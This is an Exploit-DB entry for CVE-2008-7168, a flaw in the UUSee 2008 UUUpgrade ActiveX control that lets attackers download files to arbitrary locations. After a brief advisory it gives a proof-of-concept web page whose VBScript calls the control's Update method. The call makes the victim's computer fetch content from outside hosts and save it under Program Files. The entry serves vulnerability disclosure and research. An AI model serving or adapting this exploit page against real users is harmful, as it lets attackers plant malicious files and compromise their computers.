UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability

2008-06-26T00:00:00
ID EDB-ID:31980
Type exploitdb
Reporter Symantec
Modified 2008-06-26T00:00:00

Description

UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability. CVE-2008-7168. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/29963/info

UUSee is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations on an affected computer.

Attackers may exploit this issue to overwrite sensitive files with malicious data that will compromise the affected computer. Other attacks are possible.

UUSee 2008 is vulnerable; other versions may also be affected.

<html> <object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http://www.example.com/UU.ini" arg3="http://www.example2.com/mini3/uusee_client_update/remark.php" arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 </script> </html>